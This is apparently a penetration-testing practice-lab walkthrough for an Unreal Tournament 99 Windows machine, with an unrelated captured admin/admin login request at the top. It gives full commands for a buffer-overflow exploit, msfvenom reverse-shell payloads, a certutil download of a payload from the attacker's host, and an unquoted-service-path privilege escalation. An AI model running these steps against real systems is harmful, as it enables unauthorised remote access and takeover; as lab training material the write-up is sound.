Host: 192.168.236.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.236.44/public_html/admin.php
Content-Type: multipart/form-data; boundary=---------------------------
17914201875003999151636418193
Content-Length: 291
Connection: close
Cookie: CMSSESSID=vveo6lp591nen3gg8pgqu0lsk0;
cpg_data=YToxOntzOjI6IklEIjtzOjI2OiJ2dmVvNmxwNTkxbmVuM2dnOHBncXUwbHNrMCI
7fQ%3D%3D
Upgrade-Insecure-Requests: 1

-----------------------------17914201875003999151636418193
Content-Disposition: form-data; name="alogin"

admin
-----------------------------17914201875003999151636418193
Content-Disposition: form-data; name="pwd"

admin
-----------------------------17914201875003999151636418193--

// Install hexchat to connect to IRC server


$ sudo apt-get install hexchat
$ hexchat

// Click “+Add” to add a new server -> Create “UT99”

// Click “Edit” to update this server


// Modify as follows:
● Server: 192.168.68.44/6789
● Untick “Use global user information”
● Nick name, User name, Password: fluffy
● Close to go back

// Then “Connect” to UT99 server -> “OK”


==========================
* Welcome to MadCowz!
* Welcome to the MadCowz IRC Network fluffy!fluffy@192.168.49.68
* Your host is irc.madcowz.localdomain, running version 2.0
* This server was created 10:20:51 May 10 2015
* irc.madcowz.localdomain 2.0 iosw biklmnopstv bklov
* AWAYLEN=200 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst
CHANNELLEN=64 CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=255
MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 :are supported by this server
* MAXTARGETS=20 MODES=20 NETWORK=MadCowz NICKLEN=31 PREFIX=(ov)@+
STATUSMSG=@+ TOPICLEN=307 VBANLIST WALLCHOPS WALLVOICES :are
supported by this server
* 909AAACD2 :your unique ID
* irc.madcowz.localdomain message of the day
* - Mad Cowz, y0!
* End of message of the day.
* There are 2 users and 0 invisible on 1 servers
* 1 :channels formed
* I have 2 clients and 0 servers
* Current Local Users: 2 Max: 4
* Current Global Users: 2 Max: 4
==========================
// Click “Server” -> Select “Channel List”

-> In this case, it shows nothing, but here only channels with more than 5 users. From the
log above, we see that the Madcowz server has a maximum of 4 users. So change this
value to 1.
-> Then click “Search” to find the channel.
-> We found a channel #ut99. Let's join this channel. Click “Server” -> Select “Join a
channel” and enter “ut99” -> OK

// There are 2 users: daisy and ours fluffy

-> Important message:


Topic for #ut99 is: Fragging since UT99! Unreal Tournament 99 Game Server UP! IP:
*THIS* Port: 7778
// Searchsploit Unreal Tournament

// MSF failed

Unreal Tournament - Remote Buffer Overflow (SEH) |


windows/remote/16145.pl

● Bad characters: 0x00 0x5c


● Maximum shellcode size: 938 bytes

// don’t need to regenerate the payload, just provide the correct arguments
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.68 LPORT=443
EXITFUNC=thread -f perl -b "\x00\x5c"

$ perl 16145.pl 192.168.68.44 7778 192.168.49.68 4445

// get the reverse shell

Local.txt: 649befdd7800f4cc1660d10615d795ca
C:\UnrealTournament\System>systeminfo
systeminfo

Host Name: FLUFFY-PC


OS Name: Microsoftr Windows VistaT Business
OS Version: 6.0.6002 Service Pack 2 Build 6002
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: fluffy
Registered Organization:
Product ID: 89584-OEM-7332141-00029
Original Install Date: 10/1/2015, 5:09:16 AM
System Boot Time: 12/3/2020, 12:01:38 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~3094 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-08:00) Pacific Time (US & Canada)
Total Physical Memory: 1,023 MB
Available Physical Memory: 510 MB
Page File: Max Size: 2,309 MB
Page File: Available: 1,146 MB
Page File: In Use: 1,163 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\FLUFFY-PC
Hotfix(s): 7 Hotfix(s) Installed.
[01]: KB2305420
[02]: KB2999226
[03]: KB935509
[04]: KB937287
[05]: KB938371
[06]: KB955430
[07]: KB968930
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 192.168.193.44

$ ./windows-exploit-suggester.py --database 2020-11-18-mssb.xls --systeminfo


~/OffSec/Practice/UT99/systeminfo
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 7 hotfix(es) against the 469 potential bulletins(s) with a database of 137
known exploits
[*] there are now 468 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows Vista SP2 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k
Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys'
'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ
Integer Overflow (MS16-098)
[*]
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*] https://github.com/foxglovesec/RottenPotato
[*] https://github.com/Kevin-Robertson/Tater
[*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local
WebDAV NTLM Reflection Elevation of Privilege
[*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege
Escalation
[*]
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*] https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related
EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-
074), PoC
[*] https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL
NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*]
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*] https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector
Attribute Type Confusion (MS16-063), PoC
[*]
[E] MS16-059: Security Update for Windows Media Center (3150220) - Important
[*] https://www.exploit-db.com/exploits/39805/ -- Microsoft Windows Media Center - .MCL
File Processing Remote Code Execution (MS16-059), PoC
[*]
[E] MS16-056: Security Update for Windows Journal (3156761) - Critical
[*] https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9
JavaScriptStackWalker Memory Corruption (MS15-056)
[*] http://blog.skylined.nl/20161206001.html -- MSIE jscript9 JavaScriptStackWalker
memory corruption
[*]
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile
(3143141) - Important
[*] https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle
Privilege Escalation, MSF
[*] https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary
Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
[*] https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-
2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
[*] https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-
2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)
[*]
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) -
Important
[*] https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local
Privilege Escalation, MSF
[*] https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV
Privilege Escalation Exploit (MS16-016) (2), PoC
[*] https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 -
WebDAV Privilege Escalation (MS16-016) (1), PoC
[*]
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution
(3134228) - Important
[*] Windows 7 SP1 x86 - Privilege Escalation (MS16-014),
https://www.exploit-db.com/exploits/40039/, PoC
[*]
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution
(3124901) - Important
[*] https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!
DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
[*] https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL
Planting with WMALFXGFXDSP.dll (MS-16-007), PoC
[*]
[E] MS15-134: Security Update for Windows Media Center to Address Remote Code
Execution (3108669) - Important
[*] https://www.exploit-db.com/exploits/38911/ -- Microsoft Windows Media Center Library
Parsing RCE Vulnerability aka self-executing' MCL File, PoC
[*] https://www.exploit-db.com/exploits/38912/ -- Microsoft Windows Media Center Link
File Incorrectly Resolved Reference, PoC
[*] https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object - 'els.dll'
DLL Planting (MS15-134)
[*] https://code.google.com/p/google-security-research/issues/detail?id=514 -- Microsoft
Office / COM Object DLL Planting with els.dll
[*]
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution
(3116162) - Important
[*] https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL
Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC
[*] https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll
DLL Planting (MS15-134), PoC
[*]
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[*] https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 -
CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)
[*]
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege
(3096447) - Important
[*] https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse
Point Creation Mitigation Bypass (MS15-111), PoC
[*]
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of
Privilege (3089657) - Important
[*] https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask
SettingsSyncDiagnostics Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler
DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask
TileUserBroker Privilege Escalation, PoC
[*]
[M] MS15-100: Vulnerability in Windows Media Center Could Allow Remote Code
Execution (3087918) - Important
[*] https://www.exploit-db.com/exploits/38195/ -- MS15-100 Microsoft Windows Media
Center MCL Vulnerability, MSF
[*] https://www.exploit-db.com/exploits/38151/ -- Windows Media Center - Command
Execution (MS15-100), PoC
[*]
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code
Execution (3089656) - Critical
[*] https://www.exploit-db.com/exploits/38198/ -- Windows 10 Build 10130 - User Mode
Font Driver Thread Permissions Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38199/ -- Windows
NtUserGetClipboardAccessToken Token Leak, PoC
[*]
[M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution
(3079904) - Critical
[*] https://www.exploit-db.com/exploits/38222/ -- MS15-078 Microsoft Windows Font
Driver Buffer Overflow
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of
Privilege (3057191) - Important
[*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege
Vulnerability, PoC
[*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k
Exploit, MSF
[*]
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code
Execution (3036220) - Critical
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local
Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege
Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local
Privilege Escalation (MS15-010), PoC
[*]
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) -
Critical
[*] http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege
(MS14-068), PoC
[*]
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution
(3011443) - Critical
[*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML
Application) - Remote Code Execution (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 -
Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation
Array Remote Code Execution (#1), PoC
[*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation
Array Remote Code Execution (MSF), MSF
[*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE
Package Manager Code Execution Through Python, MSF
[*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE
Package Manager Code Execution, MSF
[*]
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution
(3000869) - Important
[*] http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution
'Sandworm' Exploit (MS14-060), PoC
[*] http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE
Package Manager Code Execution, MSF
[*]
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution
(3000061) - Critical
[*] http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL
Pointer Dereference, MSF
[*]
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of
Privilege (2975684) - Important
[*] https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys
Privilege Escalation (MS14-040), PoC
[*] https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling
Pointer Privilege Escalation (MS14-040), PoC
[*]
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*] http://www.exploit-db.com/exploits/34458/
[*]
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege
(2958732) - Important
[*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote
Command Execution, PoC
[*]
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
(2916607) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of
Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-096: Vulnerability in Microsoft Graphics Component Could Allow Remote Code
Execution (2908005) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution
(2864063) - Important
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code
Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of
Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID
Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID
Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
(2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of
Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution
(2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of
Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
(981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
(977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code
Execution (969947) - Critical
[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow
Remote Code Execution (975254) - Important
[M] MS09-050: Vulnerabilities in SMBv2 Could Allow Remote Code Execution (975517) -
Critical
[*]
https://www.rapid7.com/db/modules/exploit/windows/smb/ms09_050_smb2_negotiate_fun
c_index -- MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table
Dereference
[*]
[*] done

C:\UnrealTournament\System>whoami /all
whoami /all

USER INFORMATION
----------------

User Name SID


=============== ==============================================
fluffy-pc\daisy S-1-5-21-2166732910-1323509646-2289275227-1001

GROUP INFORMATION
-----------------

Group Name Type SID Attributes


====================================== ================ ============
==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by
default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by
default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group,
Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group,
Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group,
Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by
default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory
group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Unknown SID type S-1-16-8192 Mandatory
group, Enabled by default, Enabled group

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State


============================= ====================================
========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled

C:\UnrealTournament\System>net user
net user

User accounts for \\FLUFFY-PC

-------------------------------------------------------------------------------
Administrator daisy fluffy
Guest kermit
The command completed successfully.

C:\UnrealTournament\System>net localgroup Administrators


-> fluffy belongs to Administrators group -> should we get shell of this user ???

// Found this exploit: https://www.exploit-db.com/exploits/40485


Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation

C:\UnrealTournament\System>wmic service get


name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\"
| findstr /i /v """
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\
Windows\\" | findstr /i /v """
Foxit Cloud Safe Update Service FoxitCloudUpdateService C:\
Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe
Auto

C:\UnrealTournament\System>sc qc "Foxit Cloud Safe Update Service"


sc qc "Foxit Cloud Safe Update Service"
[SC] OpenService FAILED 1060:

The specified service does not exist as an installed service.

C:\UnrealTournament\System>sc qc FoxitCloudUpdateService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FoxitCloudUpdateService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Foxit Software\Foxit Reader\
Foxit Cloud\FCUpdateService.exe
LOAD_ORDER_GROUP :
TAG :0
DISPLAY_NAME : Foxit Cloud Safe Update Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

C:\UnrealTournament\System>icacls "C:\Program Files (x86)\Foxit Software\Foxit


Reader\Foxit Cloud"
C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud NT SERVICE\
TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

C:\UnrealTournament\System>icacls "C:\Program Files (x86)\Foxit Software\Foxit


Reader"
C:\Program Files (x86)\Foxit Software\Foxit Reader fluffy-pc\daisy:(I)(W,Rc,REA,RA)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

-> It seems user daisy can write to "C:\Program Files (x86)\Foxit Software\Foxit
Reader"

// We create a reverse shell in binary, named “Foxit.exe”


$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.53 LPORT=4446 -
f exe > Foxit.exe

// Download this binary to “C:\Program Files (x86)\Foxit Software\Foxit Reader”


C:\Program Files (x86)\Foxit Software\Foxit Reader> certutil -urlcache -split -f
http://192.168.49.53/Foxit.exe Foxit.exe
// As we can not manually stop/start the service (START_TYPE : 2 AUTO_START),
we need to restart this machine in the hope of triggering our reverse shell
C:\Program Files (x86)\Foxit Software\Foxit Reader>shutdown /r /t 0

// We get the reverse shell after rebooting the machine

Proof.txt: cf6d948b72c6587110490e6c2f81ec86
C:\UnrealTournament\System>reg query HKLM\Software\Policies\Microsoft\Windows\
Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
ERROR: The system was unable to find the specified registry key or value.

C:\UnrealTournament\System>reg query HKCU\Software\Policies\Microsoft\Windows\


Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
ERROR: The system was unable to find the specified registry key or value.

// Found SQLite database that shows connections to UT99


C:\Users\daisy>type murmur.sqlite

You might also like